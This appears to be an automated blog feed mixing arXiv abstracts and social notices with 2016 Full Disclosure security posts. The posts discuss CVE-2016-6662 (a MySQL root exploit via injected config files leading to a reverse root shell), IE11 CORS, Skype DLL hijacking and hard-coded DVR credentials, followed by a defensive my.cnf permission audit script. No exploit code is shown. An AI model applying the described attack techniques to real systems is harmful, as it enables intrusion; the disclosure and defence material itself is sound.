The literature on judgment aggregation is moving from studying impossibility results regarding aggregation rules towards studying specific judgment aggregation rules. Here we give a structured list of most rules that have been proposed and studied recently in the literature, together with various properties of such rules. We first focus on the majority-preservation property, which generalizes Condorcet-consistency, and identify which of the rules satisfy it. We study the inclusion relationships that hold between the rules. Finally, we consider two forms of unanimity, monotonicity, homogeneity, and reinforcement, and we identify which of the rules satisfy these properties.



from cs.AI updates on arXiv.org http://ift.tt/1JALlVi
via IFTTT

Google's Neural Machine Translation System: Bridging the Gap between Human and Machine Translation. (arXiv:1609.08144v1 [cs.LG])

Neural Machine Translation (NMT) is an end-to-end learning approach for automated translation, with the potential to overcome many of the weaknesses of conventional phrase-based translation systems. Unfortunately, NMT systems are known to be computationally expensive both in training and in translation inference. Also, most NMT systems have difficulty with rare words. These issues have hindered NMT's use in practical deployments and services, where both accuracy and speed are essential. In this work, we present GNMT, Google's Neural Machine Translation system, which attempts to address many of these issues. Our model consists of a deep LSTM network with 8 encoder and 8 decoder layers using attention and residual connections. To improve parallelism and therefore decrease training time, our attention mechanism connects the bottom layer of the decoder to the top layer of the encoder. To accelerate the final translation speed, we employ low-precision arithmetic during inference computations. To improve handling of rare words, we divide words into a limited set of common sub-word units ("wordpieces") for both input and output. This method provides a good balance between the flexibility of "character"-delimited models and the efficiency of "word"-delimited models, naturally handles translation of rare words, and ultimately improves the overall accuracy of the system. Our beam search technique employs a length-normalization procedure and uses a coverage penalty, which encourages generation of an output sentence that is most likely to cover all the words in the source sentence. On the WMT'14 English-to-French and English-to-German benchmarks, GNMT achieves competitive results to state-of-the-art. Using a human side-by-side evaluation on a set of isolated simple sentences, it reduces translation errors by an average of 60% compared to Google's phrase-based production system.



from cs.AI updates on arXiv.org http://ift.tt/2cYvrrM
via IFTTT

I have a new follower on Twitter


UpCity
UpCity is a local inbound marketing platform built for agencies looking to acquire, scale, and drive results for their small business customers profitably.
Chicago, IL
http://t.co/BGcqTqzCtN
Following: 2383 - Followers: 3491

September 27, 2016 at 05:47PM via Twitter http://twitter.com/upcityinc

Anonymous user cannot upload private file

Anonymous users are not able to upload files when the upload destination is set to "private files". This problem does not occur with the basic Drupal ...

from Google Alert - anonymous http://ift.tt/2di7mtR
via IFTTT

Re: [FD] XSS Wordpress W3 Total Cache <= 0.9.4.1

Hi Fernando,

Do you have a timeline for this issue? Additionally do you have any contact details for the w3tc team you could share? All my attempts to contact them have fallen short.

On 21/09/16 13:56, Fernando A. Lagos Berardi wrote:
> [+] Description: Cross-Site Scripting vulnerability was found on Wordpress W3 Total Cache (w3tc) plugin.
> [+] Plugin Version tested: <= 0.9.4.1 (latest)
> [+] Wordpress version tested: 4.0.0 - 4.6.1 (latest)

Source: Gmail -> IFTTT-> Blogger

[FD] IE11 is not following CORS specification for local files

IE11 is not following CORS specification for local files like Chrome and Firefox. I've contacted Microsoft and they say this is not a security issue so I'm sharing it.

From my tests IE11 is not following CORS specifications for local files as it is supposed to. In order to prove it I've created a malicious html file with the content below.

The file above will be able to get a Skype token and perform a GET on the user profile. Instead of using the alert() function I could send this information to a domain that I control. Of course the victim needs to open the file from his local drive, or maybe another application can open an IE instance. If the user is logged on to a Microsoft account and opens the html file with the content above with an onload function instead of onclick, I'd be able to get his profile data.

This is a simple scenario. An attacker would be able to get any data from any domain that does not require a unique ID (e.g. CSRF token) which the attacker doesn't have and is unable to get. If you do the same test on Chrome or Firefox the browser will follow the CORS specification and block the response content since no CORS headers are present in the response.

I tested on IE11 running on Win7SP1 with all security patches and it worked. On Win10 it didn't work. I didn't test on any server with CORS enabled. If you think of another malicious scenario please let me know.

Thanks!
Ricardo Iramar

Source: Gmail -> IFTTT-> Blogger

Re: [FD] CVE-2016-6662 - MySQL Remote Root Code Execution / Privilege Escalation ( 0day )

Thanks for your explanation. It is a very good discovery to be sure. Yet I still think that a 'remote root' is something different - Google gives me this for example: http://ift.tt/2dhTcwq which is a way to directly become root from the internet through a vulnerable piece of server software listening on a socket. Connect, exploit, root.

In your case, another hurdle has to be cleared first - either SQL injection (which is another vulnerability), or a valid database account. So, yes, it can be exploited remotely, and yes, you can become root, but only if you have a db account or another vulnerability in front of this one.

None of this is to say that your discovery is not very cool. You are rightly proud of it.

Mark

On 23-09-16 05:58, Dawid Golunski wrote:
> Hi Mark,
>
> Thanks for the feedback. I'll answer your questions and throw in a few other comments on here using the occasion that will hopefully clarify some of the other misconceptions I've seen around or be otherwise useful to someone.
>
> As for SUPER priv requirement. The short answer is: yes, you are wrong in thinking that (but good that you question it at least :)
>
> SUPER privilege is not required as mentioned in my advisory in the dedicated chapter V. 3) titled: '3) Attackers with only SELECT/FILE permissions can gain access to logging functions[...]' You could confirm this by running the exploit, or having a look at the example run output or the replication steps that show the exact privileges applied on the test account (no SUPER privs in there :) The current PoC exploit basically abuses the power of a risky FILE privilege alone which can be used to escalate privileges via a number of ways (including extracting mysql password hashes, or injecting specially crafted triggers as shown in the advisory/PoC exploit).
>
> As for your remote exploitation and user/password requirement question. Although the current PoC is limited (to give users a chance to react to this vuln etc.), notice that the advisory mentions that SQL Injection could be used as a vector for exploitation in addition to an authenticated connection to the mysql service (via direct connection to mysql port, or via phpMyAdmin). SQL injection attacks can be conducted remotely so I'd say it is fair to call it a remote exploit. I'd say it'd still be a remote exploit even if a remote authenticated connection to mysql service was the only option (i.e. Authenticated RCE is still an RCE if that makes sense). On a separate note, I'm not aware of other _reliable/working_ recent MySQL PoC exploits that could let remote attackers (even starting with database admin/super privs) bypass protections such as SELinux and AppArmor and achieve remote code execution, let alone gain root access on top of that through MySQL exploitation. Other than the old vuln from 2003 (http://ift.tt/2d7fYqv) that is similar to my exploit and which I referenced in my advisory. Note that CERT also mentioned remote exploitation in the description of the article and gave it a CVSS score of 9.43.
>
> As for other reliable exploits that could get you a shell through MySQL. Some years ago (<2008) it used to be possible for malicious _database admin_ users (required access to CREATE FUNCTION statement) to create a malicious UDF (user-defined function) from a library that executed a system() call and let an attacker run commands as mysql system user. The UDF "trick" was blocked however in 2008, in MySQL version 5.0.67. From then on MySQL only allows loading UDF libraries from trusted system directories (writable by root only). And _even_ if you had a way to inject a library into a trusted directory and create a malicious UDF function from it, you'd still be blocked by default policies of SELinux or AppArmor on many modern systems when trying to execute system() call or similar as the mysqld process. There are some blog posts around still showing the UDF method as a way to get code execution on today's MySQL setups. They however rely on the mysqld process running as root which never happens in practice (note that my exploit targets mysqld_safe which does in contrast run as root on many default setups) and if it did, you'd have bigger problems to start with :) That's just to illustrate some of the challenges. If anyone knows of a working/reliable exploit that can address these and achieve remote code execution through MySQL then I'd be interested to learn the details :)
>
> Another misconception I've seen on some forums is that the CVE-2016-6662 vulnerability I discovered is not exploitable on systems without overly-permissive my.cnf config files (e.g. owned by mysql). This is not correct and I addressed this in the advisory in section:
>
> "'2) Create new configuration files within a MySQL data directory (writable by MySQL by default) on _default_ MySQL installs without the need to rely on improper config permissions"
>
> which mentions that attackers could in fact be able to inject new valid configs on systems with default my.cnf/datadir permissions (not implemented in the current limited PoC). This is actually the reason behind creating a dummy my.cnf in /var/lib/mysql datadir with root perms as a temporary mitigation (i.e. to prevent malicious attackers from creating a new my.cnf file in datadir on default setups when they're unable to find one with weak perms).
>
> I should have probably extended some of the descriptions in my advisory from the start to make it easier to understand for a larger group of people, but still I put a lot of effort into making the advisory quite detailed (including comments in the exploit code etc.) with most answers in it for those who read it closely/tested the provided PoC, especially taking into account the crazy circumstances/timing when it all happened... I wrote the advisory/exploits over 3 sleepless nights on my holiday when backpacking through the north of Brazil, stuck at a hostel's lounge with mosquitoes and other drunk travelers running around through the night (think of having the 'team distraction' from DefCon https://youtu.be/rVwaIe6CiHw?t=3548 over a few sleepless nights :) But that's another story, probably for a blog post or a chat with some fernet/vodka at the upcoming EkoParty conference in Buenos Aires ;)
>
> Sorry for a lengthy message. Hopefully this will answer not only your doubts but also help to clear up similar misconceptions out there. I updated my advisory with a few extra clarifications/notes at:
>
> http://ift.tt/2cpoG2D
>
> I should follow up shortly with more info shared via my website: http://legalhackers.com
>
> or my twitter feed: https://twitter.com/dawid_golunski
>
> Thanks for reading all of that (if you got here that is :)

Source: Gmail -> IFTTT-> Blogger

Re: [FD] CVE-2016-6662 - MySQL Remote Root Code Execution / Privilege Escalation ( 0day )

I think the term is 'remote privilege escalation' (as opposed to local privilege escalation). As a headline I'd suggest 'remote privilege escalation from any mysql user to root'.

Mark

On 23-09-16 19:20, Dawid Golunski wrote:
> Hi Mark,
>
> Thanks for that. I guess it depends which RCE definition you follow. For example if you take:
>
> 'The ability to trigger arbitrary code execution from one machine on another (especially via a wide-area network such as the Internet) is often referred to as remote code execution.'
> from: http://ift.tt/1mkbPsp
>
> Then you could have a remote exploit that _does_ require an authentication before triggering code execution on the remote target/machine and still call it a remote exploit. I.e. Pre-Auth Remote Execution VS Authenticated Remote Execution. You'll find many remote exploits with those prefixes, including on the cisco website you quoted, for example: http://ift.tt/1O6abzy
>
> I agree however that my exploit strays a bit from a typical RCE (leaving preauth/authed classification aside) "concept" as the code execution is not instantaneous. I.e. it involves a delay due to a service restart (necessary in order to hook to the service startup and gain the root privileges before they're dropped, since the mysqld daemon itself never serves requests as root). I've chosen 'Remote Root Code Execution / Privilege Escalation' name to keep it simple and to reflect/focus on the same end result/impact that a typical Root RCE would have - i.e. gaining a remote attacker a rootshell. If I called it a "Local exploit" then many people out there could think that they can't be attacked from another host and local shell is required. Whereas "Remote SQL injection/authed remote connection to Root Command Execution with a delay" sounds kind of long ;)
>
> One more note/clarification I might as well throw in here. Obviously it doesn't mean that the attacker has to wait endlessly for the exploit to finish its job. Once the exploitation is done and config has been poisoned with the malicious library injected they can go away and the reverse root shell will say hi whenever a restart takes place ;) Additionally, I've also found that remote attackers could be able to speed up the restart by remotely executing the SHUTDOWN command/statement which could bring the exploit closer to a typical RCE concept. I've added this note to my advisory now too.
>
> Hope this clears up the naming a bit and the reasoning behind it. Of course, I'm not trying to insist on the naming I used as you/everyone else will have their own preference for classification of a remote exploit or their own ideas for an alternative name. There are also more constructive things to be doing rather than insisting on a particular name (e.g. publishing remaining vulns :) The important bit is to keep in mind the impact of the vuln (root shell) and that it may also get exploited by remote (authed/sql injection) attackers.
>
> Thanks again.

Source: Gmail -> IFTTT-> Blogger

[FD] [Adobe Flash] local-with-filesystem sandbox bypass via navigateToURL() and UI redressing

[FD] skype installer dll hijacking vulnerability - CVE-2016-5720

Hi,

There is a DLL planting vuln in the Skype installer. This vuln had been reported to Microsoft but they decided not to fix this. Here are the vulnerability details:

Source: Gmail -> IFTTT-> Blogger

Re: [FD] XSS Wordpress W3 Total Cache <= 0.9.4.1

[FD] Welcome Faraday 2.1! Collaborative Penetration Test & Vulnerability Management Platform

After a long sprint we are proud to present Faraday v2.1: Faraday is the Integrated Multiuser Risk Environment you were looking for! It maps and leverages all the knowledge you generate in real time, letting you track and understand your audits. Our dashboard for CISOs and managers uncovers the impact and risk being assessed by the audit in real-time without the need for a single email. Developed with a specialized set of functionalities that help users improve their own work, the main purpose is to re-use the available tools in the community taking advantage of them in a collaborative way! Check out the Faraday project on GitHub. http://ift.tt/1D8gKXz

This sprint was mostly spent refactoring the Faraday Client, and it really paid off! Now it supports massive workspaces with over 200k hosts.

We also want to announce the launch of Faraday's brand new forum! There you can discuss any and all things related to Faraday. Bug reports, suggestions, and feedback are welcome! http://ift.tt/2cWL046

Changes:
- New plugin: WPscan https://wpscan.org/
- Major refactor of Faraday Client: now we support massive workspaces (200.000+ hosts)
- Dashboard is now refreshed automatically every 60 seconds
- Host Sidebar on GTK now adds information more intelligently and will never block the application
- Evidence screenshots in report generation are now bigger
- Added a help menu to the GTK UI
- Added a help section to the WEB UI
- Bugfixing propecia plugin
- 10+ minor bugs on the Web UI
- Searches containing space character on Web UI
- Updated URL shown when starting Faraday

The next events where you can find us:
(London) http://ift.tt/2dn1sZx
(Buenos Aires) http://ift.tt/1NEda1l
(Tokyo) http://ift.tt/2dn1tg3

We hope you enjoy it, and let us know if you have any questions or comments.

http://ift.tt/1D4inIk
http://ift.tt/1D8gKXz
https://twitter.com/faradaysec
http://ift.tt/2cWL046

Source: Gmail -> IFTTT-> Blogger

[FD] Vulnerability Note VU#667480 - AVer EH6108H+ hybrid DVR contains multiple vulnerabilities

Vulnerability Note VU#667480
AVer Information EH6108H+ hybrid DVR contains multiple vulnerabilities
http://ift.tt/2dhPeUt

Overview:
AVer Information EH6108H+ hybrid DVR, version X9.03.24.00.07l and possibly earlier, reportedly contains multiple vulnerabilities, including undocumented privileged accounts, authentication bypass, and information exposure.

Description:
AVer Information EH6108H+ hybrid DVR is an IP security camera management system and streaming video recorder. Version X9.03.24.00.07l and possibly earlier are reported to contain multiple vulnerabilities.

CWE-798: Use of Hard-coded Credentials - CVE-2016-6535
AVer Information EH6108H+ reportedly contains two undocumented, hard-coded account credentials. Both accounts have root privileges and may be used to gain access via an undocumented telnet service that cannot be disabled through the web user interface and runs by default.

CWE-302: Authentication Bypass by Assumed-Immutable Data - CVE-2016-6536
By guessing the handle parameter of the /setup page of the web interface, an unauthenticated attacker reportedly may be able to access restricted pages and alter DVR configurations or change user passwords.

CWE-200: Information Exposure - CVE-2016-6537
User credentials are reported to be stored and transmitted in an insecure manner. In the configuration page of the web interface, passwords are stored in base64-encoded strings. In client requests, credentials are listed in plain text in the cookie header.

For more information, refer to the researcher's disclosure. (http://ift.tt/2dAvY54 and-more)

Impact:
A remote, unauthenticated attacker may be able to gain access with root privileges to completely compromise vulnerable devices.

Solution:
The CERT/CC is currently unaware of a practical solution to this problem and recommends the following workaround.

Restrict access
As a general good security practice, only allow connections from trusted hosts and networks.

References:
http://ift.tt/2cVfBNp
http://ift.tt/2dAwmAD nd-more
http://ift.tt/1cWWrCj
http://ift.tt/2cVeD3L
http://ift.tt/1eDYFur

Source: Gmail -> IFTTT-> Blogger

Re: [FD] CVE-2016-6662 - MySQL Remote Root Code Execution / Privilege Escalation ( 0day )

Hi Mark,

Thanks for the feedback. I'll answer your questions and throw in a few other comments on here using the occasion that will hopefully clarify some of the other misconceptions I've seen around or be otherwise useful to someone.

As for SUPER priv requirement. The short answer is: yes, you are wrong in thinking that (but good that you question it at least :)

SUPER privilege is not required as mentioned in my advisory in the dedicated chapter V. 3) titled: '3) Attackers with only SELECT/FILE permissions can gain access to logging functions[...]' You could confirm this by running the exploit, or having a look at the example run output or the replication steps that show the exact privileges applied on the test account (no SUPER privs in there :) The current PoC exploit basically abuses the power of a risky FILE privilege alone which can be used to escalate privileges via a number of ways (including extracting mysql password hashes, or injecting specially crafted triggers as shown in the advisory/PoC exploit).

As for your remote exploitation and user/password requirement question. Although the current PoC is limited (to give users a chance to react to this vuln etc.), notice that the advisory mentions that SQL Injection could be used as a vector for exploitation in addition to an authenticated connection to the mysql service (via direct connection to mysql port, or via phpMyAdmin). SQL injection attacks can be conducted remotely so I'd say it is fair to call it a remote exploit. I'd say it'd still be a remote exploit even if a remote authenticated connection to mysql service was the only option (i.e. Authenticated RCE is still an RCE if that makes sense). On a separate note, I'm not aware of other _reliable/working_ recent MySQL PoC exploits that could let remote attackers (even starting with database admin/super privs) bypass protections such as SELinux and AppArmor and achieve remote code execution, let alone gain root access on top of that through MySQL exploitation. Other than the old vuln from 2003 (http://ift.tt/2d7fYqv) that is similar to my exploit and which I referenced in my advisory. Note that CERT also mentioned remote exploitation in the description of the article and gave it a CVSS score of 9.43.

As for other reliable exploits that could get you a shell through MySQL. Some years ago (<2008) it used to be possible for malicious _database admin_ users (required access to CREATE FUNCTION statement) to create a malicious UDF (user-defined function) from a library that executed a system() call and let an attacker run commands as mysql system user. The UDF "trick" was blocked however in 2008, in MySQL version 5.0.67. From then on MySQL only allows loading UDF libraries from trusted system directories (writable by root only). And _even_ if you had a way to inject a library into a trusted directory and create a malicious UDF function from it, you'd still be blocked by default policies of SELinux or AppArmor on many modern systems when trying to execute system() call or similar as the mysqld process. There are some blog posts around still showing the UDF method as a way to get code execution on today's MySQL setups. They however rely on the mysqld process running as root which never happens in practice (note that my exploit targets mysqld_safe which does in contrast run as root on many default setups) and if it did, you'd have bigger problems to start with :) That's just to illustrate some of the challenges. If anyone knows of a working/reliable exploit that can address these and achieve remote code execution through MySQL then I'd be interested to learn the details :)

Another misconception I've seen on some forums is that the CVE-2016-6662 vulnerability I discovered is not exploitable on systems without overly-permissive my.cnf config files (e.g. owned by mysql). This is not correct and I addressed this in the advisory in section:

"'2) Create new configuration files within a MySQL data directory (writable by MySQL by default) on _default_ MySQL installs without the need to rely on improper config permissions"

which mentions that attackers could in fact be able to inject new valid configs on systems with default my.cnf/datadir permissions (not implemented in the current limited PoC). This is actually the reason behind creating a dummy my.cnf in /var/lib/mysql datadir with root perms as a temporary mitigation (i.e. to prevent malicious attackers from creating a new my.cnf file in datadir on default setups when they're unable to find one with weak perms).

I should have probably extended some of the descriptions in my advisory from the start to make it easier to understand for a larger group of people, but still I put a lot of effort into making the advisory quite detailed (including comments in the exploit code etc.) with most answers in it for those who read it closely/tested the provided PoC, especially taking into account the crazy circumstances/timing when it all happened... I wrote the advisory/exploits over 3 sleepless nights on my holiday when backpacking through the north of Brazil, stuck at a hostel's lounge with mosquitoes and other drunk travelers running around through the night (think of having the 'team distraction' from DefCon https://youtu.be/rVwaIe6CiHw?t=3548 over a few sleepless nights :) But that's another story, probably for a blog post or a chat with some fernet/vodka at the upcoming EkoParty conference in Buenos Aires ;)

Sorry for a lengthy message. Hopefully this will answer not only your doubts but also help to clear up similar misconceptions out there. I updated my advisory with a few extra clarifications/notes at:

http://ift.tt/2cpoG2D

I should follow up shortly with more info shared via my website: http://legalhackers.com

or my twitter feed: https://twitter.com/dawid_golunski

Thanks for reading all of that (if you got here that is :)

Source: Gmail -> IFTTT-> Blogger
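
The CVE-2016-6662 thread above names two conditions a defender can check for: option files that are not root-owned or are writable by others (the "owned by mysql" case), and a datadir that lacks the root-owned placeholder my.cnf described as a temporary mitigation. The shell audit below is an added example, not part of the original emails or the advisory; the paths /etc/my.cnf and /etc/mysql/my.cnf and the function names check_cnf and audit_mysql_configs are assumptions to adjust for the system at hand.

```shell
#!/bin/sh
# Added example: audit MySQL option files for weak ownership or permissions.
# Function names and the default paths at the bottom are assumptions.

# check_cnf FILE [OWNER_UID]
# Prints one of: missing | weak-owner | weak-mode | ok
check_cnf() {
    cnf_file=$1
    cnf_want_uid=${2:-0}                 # expect root unless told otherwise
    [ -e "$cnf_file" ] || { echo missing; return 0; }
    # -d: the entry itself, -n: numeric ids, -L: follow symlinks
    cnf_ls=$(ls -ldnL -- "$cnf_file") || { echo missing; return 0; }
    read -r cnf_mode cnf_links cnf_uid cnf_rest <<EOF
$cnf_ls
EOF
    if [ "$cnf_uid" != "$cnf_want_uid" ]; then
        echo weak-owner                  # e.g. an option file owned by mysql
        return 0
    fi
    # Mode string looks like -rw-r--r--; char 6 is group write, char 9 other write
    case $cnf_mode in
        ?????w*|????????w*) echo weak-mode ;;
        *) echo ok ;;
    esac
}

# audit_mysql_configs DATADIR OWNER_UID FILE...
# Prints one status line per file; returns 0 only when there are no findings.
# A missing file is ignored for system paths, but inside DATADIR it is a
# finding: without a root-owned placeholder the server account could create
# an option file there itself.
audit_mysql_configs() {
    datadir=$1
    owner=$2
    shift 2
    findings=0
    for f in "$@" "$datadir/my.cnf"; do
        status=$(check_cnf "$f" "$owner")
        if [ "$status" = missing ] && [ "$f" != "$datadir/my.cnf" ]; then
            continue
        fi
        [ "$status" = ok ] || findings=$((findings + 1))
        printf '%-11s %s\n' "$status" "$f"
    done
    [ "$findings" -eq 0 ]
}

# Run the audit against assumed default locations when invoked with --run.
if [ "${1:-}" = "--run" ]; then
    audit_mysql_configs /var/lib/mysql 0 /etc/my.cnf /etc/mysql/my.cnf
fi
```

A `missing` result for the datadir entry means the placeholder mitigation from the thread is not in place on that host.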